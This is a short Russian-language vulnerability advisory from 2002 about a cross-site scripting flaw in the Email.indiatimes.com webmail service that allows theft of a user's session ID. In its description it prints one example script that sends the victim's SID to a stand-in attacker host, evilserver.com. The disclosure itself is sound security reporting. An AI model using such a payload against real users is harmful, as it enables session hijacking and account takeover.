Дата публикации: | 30.04.2002 |
Всего просмотров: | 1140 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Email.indiatimes.com – популярная система Web почты от газеты 'The Times of India'. Сценарии, используемые на Web сайте, позволяют пользователям вставлять HTML или JavaScript код в почтовые сообщения. Злонамеренный код, вставленный в электронное сообщение, может использоваться для похищения опознавательных мандатов (хотя сайт не использует куки, SID пользователя хранится в поле формы:
<Form name=Rform ...> <input type=hidden name=SID value="some_random_number:> </form>Этот SID – единственный маркер, использующийся для подтверждения подлинности пользователя). Пример: <script> self.location.href="http://evilserver.com/evil.cgi?SID="+Rform.SID.value </script> |
Ссылки: | IndiaTimes.com - Email - Session hijacking and Inbox Blocking |